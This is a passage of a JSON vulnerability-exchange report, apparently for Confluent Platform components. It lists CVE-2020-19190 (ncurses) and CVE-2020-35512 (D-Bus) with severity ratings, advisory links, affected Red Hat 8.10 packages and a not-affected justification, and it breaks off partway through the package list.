      "description": "Buffer Overflow vulnerability in _nc_find_entry in tinfo/comp_hash.c:70 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19190"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19190"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc6.md"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19190"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19190"
        }
      ],
      "published": "2023-08-22T19:16:01+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2020-35512",
      "ratings": [
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.2,
          "severity": "high",
          "method": "CVSSv2",
          "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A use-after-free flaw was found in D-Bus Development branch <= 1.13.16, dbus-1.12.x stable branch <= 1.12.18, and dbus-1.10.x and older branches <= 1.10.30 when a system has multiple usernames sharing the same UID. When a set of policy rules references these usernames, D-Bus may free some memory in the heap, which is still used by data structures necessary for the other usernames sharing the UID, possibly leading to a crash or other undefined behaviors",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-35512"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35512"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-35512"
        },
        {
          "url": "https://bugs.gentoo.org/755392"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1909101"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket/security/advisories/GHSA-m7gr-wq6g-x327"
        },
        {
          "url": "https://gitlab.freedesktop.org/dbus/dbus/-/commit/2b7948ef907669e844b52c4fa2268d6e3162a70c%20%28dbus-1.13.18%29"
        },
        {
          "url": "https://gitlab.freedesktop.org/dbus/dbus/-/commit/dc94fe3d31adf72259adc31f343537151a6c0bdd%20%28dbus-1.10.32%29"
        },
        {
          "url": "https://gitlab.freedesktop.org/dbus/dbus/-/commit/f3b2574f0c9faa32a59efec905921f7ef4438a60%20%28dbus-1.12.20%29"
        },
        {
          "url": "https://gitlab.freedesktop.org/dbus/dbus/-/issues/305"
        },
        {
          "url": "https://gitlab.freedesktop.org/dbus/dbus/-/issues/305#note_829128"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35512"
        },
        {
          "url": "https://security-tracker.debian.org/tracker/CVE-2020-35512"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5244-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5244-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-35512"
        }
      ],
      "published": "2021-02-15T17:15:12+00:00",
      "updated": "2026-06-17T03:13:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.12.8-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.12.8-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.12.8-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.12.8-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.12.8-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
